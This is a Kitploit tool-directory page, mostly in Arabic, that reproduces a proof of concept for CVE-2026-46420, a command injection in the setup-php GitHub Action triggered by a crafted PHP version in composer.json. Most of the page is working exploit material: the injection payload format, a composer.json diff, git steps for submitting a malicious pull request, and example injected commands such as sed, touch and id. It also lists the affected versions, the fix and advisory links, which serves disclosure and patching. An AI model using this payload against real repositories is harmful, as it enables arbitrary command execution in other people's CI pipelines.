Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-46420 — PoC for CVE-2026-46420, command injection in shivammathur/setup-php via repository-controlled PHP version resolution. | Kitploit
أدوات/GitHubGitHub/jvr2022/cve-2026-46420
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubjvr2022/cve-2026-46420

CVE-2026-46420

PoC for CVE-2026-46420, command injection in shivammathur/setup-php via repository-controlled PHP version resolution.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-46420 PoC

حقن أوامر في shivammathur/setup-php عندما يتم تحميل إصدار PHP من ملفات يتحكم بها المستودع.

المتأثر:

root@kitploit:~
>= 2.25.0, < 2.37.1

المُصحَّح:

root@kitploit:~
>= 2.37.1

PoC

المستودع الهدف يحتوي بالفعل على سير عمل ضعيف يقوم بسحب محتويات طلب السحب وتشغيل [email protected].

المهاجم يغير فقط composer.json.

root@kitploit:~
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]

عندما يقرأ setup-php إصدار PHP من composer.json، يتم تضمين الأمر المُحقَن في السكربت الشلّي المُنشأ وتنفيذه.

النتيجة:

root@kitploit:~
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc

إعادة الإنتاج

أنشئ فرعًا من المستودع الهدف:

root@kitploit:~
git checkout -b poc-test

استبدل ملف composer.json النظيف بنسخة PoC:

root@kitploit:~
cp attacker/composer.json composer.json

قم بتنفيذ الالتزام والدفع:

root@kitploit:~
git add composer.json
git commit -m "update composer config"
git push -u origin poc-test

افتح طلب سحب من poc-test إلى main.

يجب أن يظهر تشغيل الإجراءات أن demo-app/.env.example تم تعديله خلال خطوة setup-php.

تغيير الأمر

تنسيق الحمولة هو:

root@kitploit:~
8.2;<COMMAND> #

الحمولة الحالية:

root@kitploit:~
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #

الأمر المُنفَّذ هو:

root@kitploit:~
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example

لتغيير ما يفعله PoC، استبدل الأمر بين 8.2; و #.

أنشئ ملفًا:

root@kitploit:~
8.2;touch poc-executed #

اكتب إلى ملف:

root@kitploit:~
8.2;printf 'poc executed\n' > poc-result.txt #

اطبع مخرجات الأمر:

root@kitploit:~
8.2;id #

مثال composer.json:

root@kitploit:~
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}

الإصلاح

قم بالترقية إلى [email protected] أو أحدث.

يتم رفض نفس الحمولة على الإصدار المصحح.

المراجع

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b

تنزيل الأداة